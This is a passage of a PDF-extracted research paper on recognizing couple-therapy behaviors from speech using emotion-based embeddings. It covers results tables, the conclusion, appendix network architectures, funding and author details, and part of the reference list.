0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 P er ce nt ag e of S eg m en ts w ith E m ot io n P re se nc e Negativity label 0 Negativity label 1A ng er D is gu st Fe ar H ap py S ad 0 20 40 60 80 100 Time/(s) S ur pr is e G A B C D E F Figure 7 Sessions with similar percentage of emotions presence but different behavior label. Full-size DOI: 10.7717/peerjcs.246/fig-7 speech session. We choose two sessions and plot those sequences of emotion presence vectors of the first 100 seconds as an example in Fig. 7, in which each dot represents the emotion presence (i.e., predicted label equals to 1) at the corresponding time. For each emotion, the percentage of emotion presence segments is calculated by dividing the number of emotion presence segments by the total number of segments. These two sessions are selected as an example since they have similar audio stream length and percentage of emotion presence segments but different behavior labels: the red represents one session with ‘‘strong presence of negativity’’ while blue represents another session with ‘‘absence of negativity’’. This example reveals the fact that, as we expected, the behaviors are determined not only by the percentage of affective constructs but also the contextual information. As shown in the left (Figs. 7A–7F), the emotion presence vectors exhibit different sequential patterns within two sessions, even though no significant distribution difference can be observed in Fig. 7G. B-BP based context-dependent behavior recognition Binarized Emotion-Vector Behavior Primitives are generated by applying the Single- Emotion Classification Network (EC) systems on the couple therapy data: For each session, a sequence of emotion label vectors is generated as E =[e1,e2,...,eT], where each element ei is the 6 dimensional B-BP binary label vector at time i. That means that eij represents the presence, through a binary label 0 or 1, of emotion j at time i. Such B-BP are the input of the context-dependent behavior recognition model that has two layers of GRUs followed by two linear layers as illustrated in Fig. 3. As shown in Table 3, the average binary classification accuracy of these five behaviors is 60.43%. Considering that the classification accuracy can reach up to 50% by chance Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 17/32 https://peerj.com https://doi.org/10.7717/peerjcs.246/fig-7 http://dx.doi.org/10.7717/peerj-cs.246 2Which isn’t necessarily perfectly aligning with the basic emotion ‘‘sad’’ but follows the SSIRS manual. Table 3 Behavior binary classification accuracy in percentage for context-dependent behavior recog- nition model from emotion labels. Average Acceptance Blame Positivity Negativity Sadness 60.43 61.07 63.21 59.64 59.29 58.93 with balanced data, our results show that behavioral states can be weakly inferred from the emotion label vector sequences. Further, we perform the McNemar test, and the results above and throughout the paper are statistically significant with p < 0.01. Despite the low accuracy of the behavior positivity, these results suggest a relationship between emotions and behaviors that we investigate further below. E-BP based context-dependent behavior recognition The simple binary emotion vectors (as B-BP) indeed link emotions and behaviors. However, they also demonstrate that the binarized form of B-BP limits the provided information bandwidth to higher layers in the network, and as such limits the ability to predict the much more complex behaviors. These are reflected in the low accuracies in Table 3 . This further motivates the use of the Emotion-Embedding Behavior Primitives. As described in Fig. 4, we construct input of the E-BP context-dependent behavior recognition system using the pretrained Multi-Emotion Regression Network (ER). These E-BP embeddings capture more information than just the binary emotion labels. They potentially capture a higher abstraction of emotional content, richer paralinguistic information, conveyed through a non-binarized version that doesn’t limit the information bandwidth, and may further capture other information such as speaker characteristics or even channel information. We employ embeddings from different layers of the ER network. The layers before the employed embedding are in each case frozen and only the subsequent layers are trained as denoted in Fig. 4. The trainable part of the network includes several CNN layers with max pooling and subsequent GRU networks. The GRU part of the network is identical to the ones used by the context-dependent behavior recognition from E-BP. The use of different depth embeddings can help identify where information loss becomes too specific to the ER loss objective versus where there is too much unrelated information to the behavior task. In Table 4, the none-E-BP model, as the baseline, means all parameters are trained from random initialization instead of using the pretrained E-BP input. While E-BP_ l model means the first l layers of the pretrained ER network are fixed and their output is used as the embedding E-BP for the subsequent system. As seen in the second column of the table, all of E-BP based models perform significantly better than the B-BP based model, which achieves an improvement of 8.57% on average and up to 16.78% for Negativity. These results, further support the use of basic emotions as constructs of behavior. In general, for all behaviors, the higher-level E-BP s, which are closer to the ER loss function, can capture affective information and obtain better performance in behavior quantification compared with lower-level embeddings. From the description in Table 1, some behaviors are closely related to emotions. For example, negativity is defined in part as ‘‘Overtly expresses rejection, defensiveness, blaming, and anger’’, and sadness2 is defined in part as Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 18/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.246 311,875 samples from commit: https://github.com/A2Zadeh/ CMU-MultimodalSDK/commit/ f0159144f528380898df8093381c8d83fd7cc475. Table 4 Behavior binary classification accuracy in percentage for context-dependent behavior recog- nition model from emotion-embeddings. Bold numbers represent the best performing system. Average Acceptance Blame Positivity Negativity Sadness None-E-BP model (Baseline) 58.86 62.86 62.50 57.86 60.00 51.07 E-BP_1 model 59.79 64.29 62.86 60.00 61.07 50.71 E-BP_2 model 60.79 61.79 63.93 62.86 63.57 51.79 E-BP_3 model 65.00 66.07 69.29 65.36 69.29 55.00 E-BP_4 model 69.00 72.50 71.79 65.36 76.07 59.29 ‘‘expresses unhappiness and disappointment’’. This shows that these behaviors are very related to emotions such as anger and sad, thus it’s expected that an embedding closer to the ER loss function will behave better. Note that these are not at all the same though: a negative behavior may mean that somewhere within the 10 min interaction or through unlocalized gestalt information the expert annotators perceived negativity; in contrast a negative emotion has short-term information (on average 7s segment) that is negative. An interesting experiment is what happens if we use a lower-ratio of emotion (out-of- domain) vs. behavior (couples-in-domain) data. To perform this experiment we use only half of the CMU-MOSEI data3 to train another ER system, and use this less robust ER system and corresponding E-BP representations to reproduce the behavior quantification as in Table 4. What we observe is that the reduced learning taking place on emotional data requires the in-domain system to have prefer embeddings closer to the feature. Specifically Negativity performs equally well with layers 3 or 4 at 71.43%. Positivity performs best with layer 3 at 64.64%, Blame and Acceptance perform best with layer 2 at 71.07% and 72.86% respectively while Sadness performs best through layer 1 at 56.07%. In the reduced data case we observe that best performing layer is not consistently layer 4. Employing the full dataset as in Table 4 provides better performance than using less data and in that case layer 4 (E-BP_4) is always the best performing layer, thus showing that more emotion data provides better ability of transfer learning. Reduced context-dependent behavior recognition In the previous two sections we demonstrate that there is a benefit to transfer emotion- related knowledge to behavior tasks. We show that the wider bandwidth information transfer through an embedding E-BP is beneficial to a binarized B-BP representation. We also show that depending on the degree of relationship of the desired behavior to the signal or to the basic emotion, different layers that are closer to the input signal or closer to the output loss, may be more or less appropriate. However, in all the above cases we assume that the sequence and contextualization of the extracted emotion information was needed. That is captured and encoded through the recursive GRU layers. We conduct an alternative investigation into how much contextual information is needed. As discussed in section Reduced context-dependent behavior recognition from emotion-informed embeddings and shown on Fig. 6 we can reduce context through changing the receptive field of our network prior to removing sequential information via max pooling. Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 19/32 https://github.com/A2Zadeh/CMU-MultimodalSDK/commit/f0159144f528380898df8093381c8d83fd7cc475 https://github.com/A2Zadeh/CMU-MultimodalSDK/commit/f0159144f528380898df8093381c8d83fd7cc475 https://github.com/A2Zadeh/CMU-MultimodalSDK/commit/f0159144f528380898df8093381c8d83fd7cc475 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.246 Table 5 Behavior binary classification accuracy in percentage for reduced context-dependent behavior recognition from emotion-informed embeddings. Bold numbers represent the best performing system. Average Acceptance Blame Positivity Negativity Sadness Receptive_field_ 4s 63.43 65.00 70.00 58.92 67.50 55.71 Receptive_field_ 8s 62.71 65.00 69.64 56.79 66.07 56.07 Receptive_field_ 16s 63.36 63.57 69.64 60.71 66.42 56.43 Receptive_field_ 32s 66.36 68.21 73.21 63.21 71.43 55.71 Receptive_field_ 64s 65.57 66.43 72.86 62.50 71.79 54.29 In this section we select the best E-BP based on average results in Table 4, i.e., E-BP-4, as the input of the reduced context-dependent behavior recognition model. Based on E-BP-4 embeddings, the reduced context-dependent model employs 4 more CNN layers with optional local average pooling layers in between, and is followed by an adaptive max pooling layer and three fully connected layers to predict the session level label directly without sequential modules. Since the number of parameters of this model is largely increased, dropout (Srivastava et al., 2014) layers are also utilized to prevent overfitting. Local average pooling layers with kernel size 2 and stride 2 are optionally added between newly added CNN layers to adjust the final size of the receptive field: the more average pooling layers we use, the larger temporal receptive field can be obtained for the same number of network parameters. We endure that the overall number of trainable parameters is the same for the different receptive field settings, which provides a fair comparison of the resulting systems. The output of these CNN/local pooling layers is passed to an adaptive max pooling before the fully connected layers as in Fig. 6. In Table 5, each model has a different temporal receptive window ranging from 4 seconds to 1 min. For most behaviors, we observe a better classification as the receptive field size increases, especially in the range from 4 seconds to 32 s, demonstrating a need for longer observations for behaviors. Furthermore, the results suggest different behaviors require different observation window length to be quantified, which is also observed by Chakravarthula et al. (2019) using lexical analysis. By comparing results with different receptive window sizes, we can indirectly obtain the appropriate behavior analysis window size for each behavior code. As shown in Table 5, sadness has a smaller optimal receptive field size than behaviors such as acceptance, positivity and blame. This is in good agreement with the behavior descriptions. For example, behaviors of acceptance, positivity and blame often require relatively longer observations since they relate to understanding and respect for partner’s views, positive negotiation, and accusation respectively, which often require multiple turns in a dialog and context to be captured. On the other hand, sadness which can be expressed via emitting a long, deep, audible breath, and is also related to short-term expression of unhappy affect, can be captured with shorter windows. Moreover, we find the classification of negativity reaches high accuracy when using a large receptive field. This might be contributed by the fact that the negative behavior in the couple therapy domain is complex, which is not only revealed by short term negative Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 20/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.246 4Note that this does not make any claims on interlocutor dynamics, talk time, turn- taking etc., but just single person acoustics. affect but also related to context based negotiation and hostility, and is captured through gestalt perception of the interaction. In addition, the conclusion that most of the behaviors do not benefit much from longer than 30 s4 windows matched existing literature on thin slices (Ambady & Rosenthal, 1992), which refer to excerpts of an interaction that can be used to arrive at a similar judgment of behavior to as if the entire interaction had been used. Analysis on behavior prediction uncertainty reduction Besides the verification of the improvement from B-BP based model to E-BP based models, in this section, we further analyze the importance of context information for each behavior by comparing results between E-BP based context-dependent and reduced context-dependent models. This analysis calls into question that which behavior is more context involved and to what degree. Classification accuracy is used as the evaluation criterion in previous experiments. More generally, this number can be regarded as a probability of correct classification when a new session comes to measure. Inspired by entropy from information theory, we define one metric named Prediction Uncertainty Reduction (PUR) and use it to indicate the relative behavior prediction and interpretation improvement among different models for each behavior. Suppose pm(x)∈[0,1] is the probability of correct classification for behavior x with model m. We define the uncertainty of behavior prediction as: Im(x)=−pm(x)log2(pm(x))−(1−pm(x))log2(1−pm(x)) if pm(x) is equal to 1, Im(x)=0 there is no improvement possibility; if pm(x) is equal to 0.5, same as random prediction accuracy, the uncertainty is the largest. We further define the Prediction Uncertainty Reduction (PUR) value of behavior x from model m to model n as: Rm→n(x)= Im(x)−In(x). We use this value to indicate improvements between different models. We use PUR to sense the relative improvement from E-BP based context-dependent and E-BP based reduced context-dependent models respectively, to the baseline B-BP based context-dependent model. The larger value of PUR suggests the clear improvement of behavior prediction. For each behavior, for each E-BP based model, we choose the best performance model (the bold number from Tables 4 and 5) to calculate PUR value from baseline B-BP context-dependent model. In Fig. 8, as expected, for most behaviors the positive PUR values verify the improvement from using informative E-BP to simple binary B-BP. In addition, the results support the hypothesis that the sequential order of affective states is one non-negligible factor of behavior analysis since the PRU of context-dependent (blue color) model is better than that of reduced context one (red color) for most behaviors. More interestingly, for each behavior, the difference between two bars (i.e., PUR difference) can imply the necessity and importance of the sequential and contextual factor of quantifying that behavior. We notice that for ‘‘positive’’ or more ‘‘complex problem Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 21/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.246 Average Acceptance Blame Positivity Negativity Sadness Behavior 0 0.05 0.1 0.15 0.2 P re d ic tio n U n ce rt a in ty R e d u ct io n V a lu e E-BP based context-dependent E-BP based reduced context-dependent Figure 8 PUR optimal value of E-BP based context-dependent and reduced context-dependent mod- els across behaviors. Full-size DOI: 10.7717/peerjcs.246/fig-8 solving’’ related behaviors (e.g., Acceptance, Positivity), the context based model can achieve better performance than the reduced context model. While the PUR differences from ‘‘negative’’ related behaviors (e.g., Blame, Negativity) varies from different behaviors. For example, the behavior of acceptance, with a large PUR difference, it is more related to ‘‘understanding, respect for partner’s views, feelings and behaviors’’, which could involve more turns in a dialog and context information. In addition, positivity requires the monitoring of consistent positive behavior, since a single negative instance within a long positive time interval would still reduce positivity to a very low rating. In contrast, we see that although blame can still benefit from a larger contextual window, there is no benefit to employing the full context. This may infer that blame expression is more localized. Furthermore, our findings are also congruent with many domain annotation processes: some behaviors are potentially dominated by salient information with short range, and one short duration appearance can have a significant impact on the whole behavior rating, while some behaviors need longer context to analyze (Heavey, Gill & Christensen, 2002; Jones & Christensen, 1998). However, among all behaviors, ‘‘sadness’’ is always the hardest one to predict with high accuracy, and there is little improvement after introducing different BPs. This could be resulting from the extremely skewed distribution towards low ratings as mentioned in above and (Georgiou et al., 2011; Black et al., 2013), which leads to a very blurred binary classification boundary compared to other behaviors. The detailed network architecture and training parameters are shown in the appendix from Tables A1–A5. Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 22/32 https://peerj.com https://doi.org/10.7717/peerjcs.246/fig-8 http://dx.doi.org/10.7717/peerj-cs.246 CONCLUSION AND FUTURE WORK In this work, we explored the relationship between emotion and behavior states, and further employed emotions as behavioral primitives in behavior classification. In our designed systems, we first verified the existing connection between basic emotions and behaviors, then further verified the effectiveness of utilizing emotions as behavior primitive embeddings for behavior quantification through transfer learning. Moreover, we designed a reduced context model to investigate the importance of context information in behavior quantification. Through our models, we additionally investigated the empirical analysis window size for speech behavior understanding, and verified the hypothesis that the order of affective states is an important factor for behavior analysis. We provided experimental evidence and systematic analyses for behavior understanding via emotion information. To summarized, we investigated three questions and we concluded: 1. Can the basic emotion states infer behaviors? The answer is yes. Behavioral states can be weakly inferred from emotions states. However behavior requires richer information than just binary emotions. 2. Can emotion-informed embeddings be employed in the prediction of behaviors? The answer is yes. The rich emotion involved embedding representation helps the prediction of behaviors. They also do so much better than the information-bottlenecked binary emotions. 3. Is the contextual (sequential) information important in defining behaviors? The answer is yes. We verify the importance of context of behavior indicators for all behaviors. Some behaviors benefit from incorporating the full interaction (10 minutes) length while others require as little as 16 seconds of information, but all perform best when given contextual information. Moreover, the proposed neural network systems are not limited to the datasets and domains of this work, but potentially provides a path for investigating a range of problems, such as local versus global, sequential versus non-sequential comparisons in many related areas. In addition to the relationship of emotions to behaviors, a range of other cues can also be incorporated towards behavior quantification. Moreover, many other aspects of behavior, such as entrainment, turn-taking duration, pauses, non-verbal vocalizations, and influence between interlocutors, can be incorporated. Many such additional features can be similarly developed on different data and employed as primitives; for example entrainment measures can be trained through unlabeled data (Nasir et al., 2018). Furthermore, we expect that the results of behavior classification accuracy maybe be further improved through improved architectures, parameter tuning, and data engineering for each behavior of interest. In addition, behavior primitives, e.g., from emotions, can also be employed via the lexical and visual modalities. ACKNOWLEDGEMENTS The authors would like to thank Yi Zhou, Sandeep Nallan Chakravarthula and professor Shrikanth Narayanan for helpful discussions and comments. Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 23/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.246 APPENDIX A. DETAILED NETWORK ARCHITECTURE AND TRAINING PARAMETERS Table A1 Network architecture of ER. Multi-Emotion Regression Network (ER) framework (Input: 84 * 100 ; Output:6) Training details: Adam optimizer(lr = 1e–05), batch size 16, MSELoss Conv1d(in_ch=84, out_ch=96, kernel size=10, stride=2, padding=0) ReLU Conv1d(in_ch=96, out_ch=96, kernel size=5, stride=2, padding=0) ReLU Conv1d(in_ch=96, out_ch=96, kernel size=5, stride=2, padding=0) ReLU Conv1d(in_ch=96, out_ch=128, kernel size=3, stride=2, padding=0) ReLU AdaptiveMaxPool1d(1) Linear(in =128, out =128) ReLU Linear(in =128, out =128) ReLU Linear(in =128, out =6) Table A2 Network architecture of EC. Single-Emotion Classification Network (EC) framework (Input: 84 * 100 ; Output: 2) Training details: Adam optimizer(lr = 1e–05), CrossEntropyLoss, batch size: 32; 64; 128 Conv1d(in_ch=84, out_ch=96, kernel size=10, stride=2, padding=0) ReLU Conv1d(in_ch=96, out_ch=96, kernel size=5, stride=2, padding=0) ReLU Conv1d(in_ch=96, out_ch=96, kernel size=5, stride=2, padding=0) ReLU Conv1d(in_ch=96, out_ch=128, kernel size=3, stride=2, padding=0) ReLU AdaptiveMaxPool1d(1) Linear(in =128, out =128) ReLU Linear(in =128, out =128) ReLU Pretrained Linear(in =128, out =64) PReLU Linear(in =64, out =64) PReLU Linear(in =64, out =2) Trainable Table A3 B-BP based context-dependent behavior recognition model framework. E-BP based context-dependent behavior recognition model (Input: seq_len*6; Output: 5) Training details: Adam optimizer(lr = 1e–04) + Polynomial learning rate decay, Masked BCEWithLogitsLoss, batch size: 1 Emotion recognition framework Pretrained GRU(in_size =6, hidden_size = 128, num_layers=2) Linear(in =128, out =64) ReLU Trainable Linear(in =64, out =5) Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 24/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.246 Table A4 E-BP based context-dependent behavior recognition model framework. E-BP based context-dependent behavior recognition model (Input: seq_len * 84 * 100 ; Output: 5) Training details: Adam optimizer(lr = 1e–05) + Polynomial learning rate decay, Masked BCEWithLogitsLoss, batch size: 1, epochs=300 Conv1d(in_ch=84, out_ch=96, kernel size=10, stride=2, padding=0) ReLU Partly pretrained Partly trainable Conv1d(in_ch=96, out_ch=96, kernel size=5, stride=2, padding=0) ReLU Conv1d(in_ch=96, out_ch=96, kernel size=5, stride=2, padding=0) ReLU Conv1d(in_ch=96, out_ch=128, kernel size=3, stride=2, padding=0) ReLU AdaptiveMaxPool1d(1) GRU(in_size =128, hidden_size = 128, num_layers=2) Linear(in =128, out =64) ReLU Linear(in =64, out =5) Trainable Table A5 E-BP based reduced context-dependent behavior recognition model framework. Those AvgPool1d layers are optional to adjust tem- poral receptive field size. E-BP based reduced context-dependent behavior recognition model (Input: 84 * seq_len ; Output: 5) Training details: Adam optimizer(lr = 1 e–04) + Polynomial learning rate decay, Masked BCEWithLogitsLoss, batch size: 48, epochs=350 Conv1d(in_ch=84, out_ch=96, kernel size=10, stride=2, padding=0) ReLU Behavior primitive embedding (Pretrained) Conv1d(in_ch=96, out_ch=96, kernel size=5, stride=2, padding=0) ReLU Conv1d(in_ch=96, out_ch=96, kernel size=5, stride=2, padding=0) ReLU Conv1d(in_ch=96, out_ch=128, kernel size=3, stride=2, padding=0) ReLU Conv1d(in_ch=128, out_ch=96, kernel size=3, stride=2, padding=0) AvgPool1d(kernel size=2, stride=2) ReLU Dropout(prob=0.4) Conv1d(in_ch=96, out_ch=96, kernel size=3, stride=2, padding=0) AvgPool1d(kernel size=2, stride=2) ReLU Dropout(prob=0.4) Conv1d(in_ch=96, out_ch=96, kernel size=3, stride=1, padding=0) AvgPool1d(kernel size=2, stride=2) ReLU Dropout(prob=0.4) Conv1d(in_ch=96, out_ch=128, kernel size=3, stride=1, padding=0) AvgPool1d(kernel size=2, stride=2) ReLU Dropout(prob=0.5) AdaptiveMaxPool1d(1) Linear(in =128, out =128) ReLU Linear(in =128, out =64) ReLU Linear(in =64, out =5) Trainable ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was funded by the Department of Defense. The US Army Medical Research Acquisition Activity is the awarding and administering acquisition office. This work was Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 25/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.246 supported by the Office of the Assistant Secretary of Defense for Health Affairs through the Psychological Health and Traumatic Brain Injury Research Program under Award No. W81XWH-15-1-0632. There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Department of Defense. US Army Medical Research Acquisition Activity. Office of the Assistant Secretary of Defense for Health Affairs: W81XWH-15-1-0632. Competing Interests The authors declare there are no competing interests. Author Contributions • Haoqi Li conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Brian Baucom analyzed the data, authored or reviewed drafts of the paper, approved the final draft. • Panayiotis Georgiou conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: The code used in this work is available at https://bitbucket.org/georgiou/emotions_as_ primitives_towards_behavior_understanding. The Couples Therapy Corpus involves human subjects participating in real couple therapy interactions and as such is protected under an Institutional Review Board (IRB). Information on obtaining IRB clearance and access to the corpus can be obtained by contacting the author: Haoqi Li, haoqili@usc.edu. REFERENCES Aldeneh Z, Provost EM. 2017. Using regional saliency for speech emotion recognition. In: 2017 IEEE international conference on acoustics, speech and signal processing (ICASSP). Piscataway: IEEE, 2741–2745. Ambady N, Rosenthal R. 1992. Thin slices of expressive behavior as predictors of interpersonal consequences: a meta-analysis. Psychological Bulletin 111(2):256–274 DOI 10.1037/0033-2909.111.2.256. Anand N, Verma P. 2015. Convoluted feelings convolutional and recurrent nets for detecting emotion from audio data. Technical report. Stanford University. Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 26/32 https://peerj.com https://bitbucket.org/georgiou/emotions_as_primitives_towards_behavior_understanding https://bitbucket.org/georgiou/emotions_as_primitives_towards_behavior_understanding mailto:haoqili@usc.edu http://dx.doi.org/10.1037/0033-2909.111.2.256 http://dx.doi.org/10.7717/peerj-cs.246 Baer JS, Wells EA, Rosengren DB, Hartzler B, Beadnell B, Dunn C. 2009. Agency context and tailored training in technology transfer: a pilot evaluation of motiva- tional interviewing training for community counselors. Journal of Substance Abuse Treatment 37(2):191–202 DOI 10.1016/j.jsat.2009.01.003. Baumeister RF, DeWall CN, Vohs KD, Alquist JL. 2010. Does emotion cause behavior (apart from making people do stupid, destructive things). In: Then a miracle occurs: focusing on behavior in social psychological theory and research. New York: Oxford University Press, 12–27. Baumeister RF, Vohs KD, Nathan DeWall C, Zhang L. 2007. How emotion shapes behavior: feedback, anticipation, and reflection, rather than direct causation. Person- ality and Social Psychology Review 11(2):167–203 DOI 10.1177/1088868307301033. Beale R, Peter C. 2008. Affect and emotion in human-computer interaction. Berlin/Heidel- berg: Springer. Bengio Y. 2012. Deep learning of representations for unsupervised and transfer learning. In: Proceedings of ICML workshop on unsupervised and transfer learning. 17–36. Bengio Y, Courville A, Vincent P. 2013. Representation learning: a review and new perspectives. IEEE Transactions on Pattern Analysis and Machine Intelligence 35(8):1798–1828 DOI 10.1109/TPAMI.2013.50. Black M, Katsamanis A, Lee C-C, Lammert AC, Baucom BR, Christensen A, Georgiou PG, Narayanan SS. 2010. Automatic classification of married couples’ behavior using audio features. In: Eleventh annual conference of the international speech communication association. Black MP, Katsamanis A, Baucom BR, Lee C-C, Lammert AC, Christensen A, Georgiou PG, Narayanan SS. 2013. Toward automating a human behavioral coding system for married couples interactions using speech acoustic features. Speech Communication 55(1):1–21 DOI 10.1016/j.specom.2011.12.003. Burum BA, Goldfried MR. 2007. The centrality of emotion to psychological change. Clinical Psychology: Science and Practice 14(4):407–413. Busso C, Narayanan SS. 2008. The expression and perception of emotions: comparing assessments of self versus others. In: Ninth annual conference of the international speech communication association. Cabanac M. 2002 What is emotion? Behavioural Processes 60(2):69–83 DOI 10.1016/S0376-6357(02)00078-5. Carney DR, Colvin CR, Hall JA. 2007. A thin slice perspective on the accuracy of first impressions. Journal of Research in Personality 41(5):1054–1072 DOI 10.1016/j.jrp.2007.01.004. Carrillo F, Mota N, Copelli M, Ribeiro S, Sigman M, Cecchi G, Slezak DF. 2016. Emotional intensity analysis in bipolar subjects. ArXiv preprint. arXiv:1606.02231. Chakravarthula SN, Baucom B, Narayanan S, Georgiou P. 2019. An analysis of observation length requirements in spoken language for machine understanding of human behaviors. ArXiv preprint. arXiv:1911.09515. Christensen A, Atkins DC, Berns S, Wheeler J, Baucom DH, Simpson LE. 2004. Traditional versus integrative behavioral couple therapy for significantly and Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 27/32 https://peerj.com http://dx.doi.org/10.1016/j.jsat.2009.01.003 http://dx.doi.org/10.1177/1088868307301033 http://dx.doi.org/10.1109/TPAMI.2013.50 http://dx.doi.org/10.1016/j.specom.2011.12.003 http://dx.doi.org/10.1016/S0376-6357(02)00078-5 http://dx.doi.org/10.1016/j.jrp.2007.01.004 http://arXiv.org/abs/1606.02231 http://arXiv.org/abs/1911.09515 http://dx.doi.org/10.7717/peerj-cs.246 chronically distressed married couples. Journal of Consulting and Clinical Psychology 72(2):176–191 DOI 10.1037/0022-006X.72.2.176. Chung J, Gulcehre C, Cho K, Bengio Y. 2014. Empirical evaluation of gated recurrent neural networks on sequence modeling. In: NIPS 2014 workshop on deep learning, December 2014. Collobert R, Weston J, Bottou L, Karlen M, Kavukcuoglu K, Kuksa P. 2011. Natural language processing (almost) from scratch. Journal of Machine Learning Research 12(Aug):2493–2537. Cowie R, Cornelius RR. 2003. Describing the emotional states that are expressed in speech. Speech Communication 40(1–2):5–32 DOI 10.1016/S0167-6393(02)00071-7. Cowie R, Douglas-Cowie E, Tsapatsoulis N, Votsis G, Kollias S, Fellenz W, Taylor JG. 2001. Emotion recognition in human-computer interaction. IEEE Signal Processing Magazine 18(1):32–80 DOI 10.1109/79.911197. Cummins N, Scherer S, Krajewski J, Schnieder S, Epps J, Quatieri TF. 2015. A review of depression and suicide risk assessment using speech analysis. Speech Communication 71:10–49 DOI 10.1016/j.specom.2015.03.004. Dunlop S, Wakefield M, Kashima Y. 2008. Can you feel it? Negative emotion, risk, and narrative in health communication. Media Psychology 11(1):52–75 DOI 10.1080/15213260701853112. Ekman P. 1992a. Are there basic emotions? Psychological Review 99(3):550–553 DOI 10.1037/0033-295X.99.3.550. Ekman P. 1992b. An argument for basic emotions. Cognition & Emotion 6(3–4):169–200 DOI 10.1080/02699939208411068. El Ayadi M, Kamel MS, Karray F. 2011. Survey on speech emotion recognition: fea- tures, classification schemes, and databases. Pattern Recognition 44(3):572–587 DOI 10.1016/j.patcog.2010.09.020. Feinberg ME, Kan ML, Hetherington EM. 2007. The longitudinal influence of coparent- ing conflict on parental negativity and adolescent maladjustment. Journal of Marriage and Family 69(3):687–702 DOI 10.1111/j.1741-3737.2007.00400.x. Georgiou PG, Black MP, Lammert AC, Baucom BR, Narayanan SS. 2011. ‘‘That’s aggra- vating, very aggravating’’: is it possible to classify behaviors in couple interactions using automatically derived lexical features? In: D’Mello S, Graesser A, Schuller B, Martin J-C, eds. Affective computing and intelligent interaction. Berlin: Springer Berlin, Heidelberg, 87–96. Georgiou PG, Black MP, Narayanan SS. 2011. Behavioral signal processing for under- standing (distressed) dyadic interactions: some recent developments. In: Proceedings of the 2011 joint ACM workshop on Human gesture and behavior understanding. ACM, 7–12. Ghahremani P, BabaAli B, Povey D, Riedhammer K, Trmal J, Khudanpur S. 2014. A pitch extraction algorithm tuned for automatic speech recognition. In: Acoustics, speech and signal processing (ICASSP), 2014 IEEE international conference on. IEEE, 2494–2498. Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 28/32 https://peerj.com http://dx.doi.org/10.1037/0022-006X.72.2.176 http://dx.doi.org/10.1016/S0167-6393(02)00071-7 http://dx.doi.org/10.1109/79.911197 http://dx.doi.org/10.1016/j.specom.2015.03.004 http://dx.doi.org/10.1080/15213260701853112 http://dx.doi.org/10.1037/0033-295X.99.3.550 http://dx.doi.org/10.1080/02699939208411068 http://dx.doi.org/10.1016/j.patcog.2010.09.020 http://dx.doi.org/10.1111/j.1741-3737.2007.00400.x http://dx.doi.org/10.7717/peerj-cs.246 Ghosh PK, Tsiartas A, Narayanan S. 2011. Robust voice activity detection using long- term signal variability. IEEE Transactions on Audio, Speech, and Language Processing 19(3):600–613 DOI 10.1109/TASL.2010.2052803. Gupta R, Malandrakis N, Xiao B, Guha T, Van Segbroeck M, Black M, Potamianos A, Narayanan S. 2014. Multimodal prediction of affective dimensions and depression in human-computer interactions. In: Proceedings of the 4th international workshop on audio/visual emotion challenge. ACM, 33–40. Han K, Yu D, Tashev I. 2014. Speech emotion recognition using deep neural network and extreme learning machine. In: Fifteenth annual conference of the international speech communication association. Heavey C, Gill D, Christensen A. 2002. Couples interaction rating system 2 (CIRS2). Vol. 7. Los Angeles: University of California. Heavey CL, Christensen A, Malamuth NM. 1995. The longitudinal impact of demand and withdrawal during marital conflict. Journal of Consulting and Clinical Psychology 63(5):797–801 DOI 10.1037/0022-006X.63.5.797. Heyman RE. 2004. Rapid marital interaction coding system (RMICS). In: Couple observational coding systems. Routledge, 81–108. Heyman RE, Chaudhry BR, Treboux D, Crowell J, Lord C, Vivian D, Waters EB. 2001. How much observational data is enough? An empirical test using marital interaction coding. Behavior Therapy 32(1):107–122 DOI 10.1016/S0005-7894(01)80047-2. Hoff E. 2009. Language development at an early age: learning mechanisms and outcomes from birth to five years. In: Tremblay RE, Boivin M, Peters RDEV, Rvachew S, eds. Encyclopedia on early childhood development. Available at http://www.child- encyclopedia.com/language-development-and-literacy/according-experts/language- development-early-age-learning. Huang C-W, Narayanan S. 2017a. Characterizing types of convolution in deep convo- lutional recurrent neural networks for robust speech emotion recognition. ArXiv preprint. arXiv:1706.02901. Huang C-W, Narayanan SS. 2017b. Deep convolutional recurrent neural network with attention mechanism for robust speech emotion recognition. In: Multimedia and expo (ICME), 2017 IEEE international conference on. IEEE, 583–588. Jones J, Christensen A. 1998. Couples interaction study: social support interaction rating system. Vol. 7. Los Angeles: University of California. Katsamanis A, Black M, Georgiou PG, Goldstein L, Narayanan S. 2011. SailAlign: Robust long speech-text alignment. In: Proc. of workshop on new tools and methods for very-large scale phonetics research. Khorram S, Jaiswal M, Gideon J, McInnis M, Provost E-M. 2018. The PRIORI emotion dataset: linking mood to emotion detected in-the-wild. Proc. Interspeech 2018 1903–1907. Kingma DP, Ba J. 2014. Adam: a method for stochastic optimization. ArXiv preprint. arXiv:1412.6980. Li et al. (2020), PeerJ Comput. 